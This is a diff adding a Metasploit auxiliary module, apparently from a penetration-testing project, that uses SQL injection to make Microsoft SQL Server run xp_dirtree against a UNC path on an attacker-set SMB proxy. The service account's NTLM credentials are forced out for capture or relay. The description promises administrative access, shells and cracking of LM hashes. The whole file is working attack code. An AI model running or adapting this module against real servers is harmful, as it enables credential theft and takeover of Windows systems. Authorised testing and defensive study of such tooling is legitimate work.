|
| 1 | +require 'msf/core' |
| 2 | + |
| 3 | +class Metasploit3 < Msf::Auxiliary |
| 4 | + |
| 5 | + include Rex::Text |
| 6 | + include Msf::Exploit::Remote::MSSQL_SQLI |
| 7 | + |
| 8 | + def initialize(info = {}) |
| 9 | + super(update_info(info, |
| 10 | + 'Name' => 'Microsoft SQL Server NTLM Stealer - SQLi', |
| 11 | + 'Description' => %q{ |
| 12 | + This module can be used to help capture or relay the LM/NTLM |
| 13 | + credentials of the account running the remote SQL Server service. |
| 14 | + The module will use the SQL injection from GET_PATH to connect to the |
| 15 | + target SQL Server instance and execute the native "xp_dirtree" or |
| 16 | + stored procedure. The stored procedures will then |
| 17 | + force the service account to authenticate to the system defined in |
| 18 | + the SMBProxy option. In order for the attack to be successful, the |
| 19 | + SMB capture or relay module must be running on the system defined |
| 20 | + as the SMBProxy. The database account used to connect to the |
| 21 | + database should only require the "PUBLIC" role to execute. |
| 22 | + Successful execution of this attack usually results in local |
| 23 | + administrative access to the Windows system. Specifically, this |
| 24 | + works great for relaying credentials between two SQL Servers using |
| 25 | + a shared service account to get shells. However, if the relay fails, |
| 26 | + then the LM hash can be reversed using the Halflm rainbow tables and |
| 27 | + john the ripper. |
| 28 | + }, |
| 29 | + 'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>', 'Antti <antti.rantasaari[at]netspi.com>' ], |
| 30 | + 'License' => MSF_LICENSE, |
| 31 | + 'Targets' => |
| 32 | + [ |
| 33 | + [ 'Automatic', { } ], |
| 34 | + ], |
| 35 | + 'DefaultTarget' => 0, |
| 36 | + 'Platform' => [ 'Windows' ], |
| 37 | + 'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]], |
| 38 | + )) |
| 39 | + |
| 40 | + register_options( |
| 41 | + [ |
| 42 | + OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']), |
| 43 | + ], self.class) |
| 44 | + end |
| 45 | + |
| 46 | + def run |
| 47 | + |
| 48 | + # Reminder |
| 49 | + print_status("DONT FORGET to run a SMB capture or relay module!") |
| 50 | + |
| 51 | + # Generate random file name |
| 52 | + rand_filename = Rex::Text.rand_text_alpha(8, bad='') |
| 53 | + |
| 54 | + # Setup query - double escaping backslashes |
| 55 | + sql = "exec master..xp_dirtree '\\\\\\\\#{datastore['SMBPROXY']}\\#{rand_filename}'" |
| 56 | + print_status("Attempting to force backend DB to authenticate to the #{datastore['SMBPROXY']}") |
| 57 | + |
| 58 | + # Execute query to force authentation from backend database to smbproxy |
| 59 | + mssql_query(sql) |
| 60 | + end |
| 61 | +end |
0 commit comments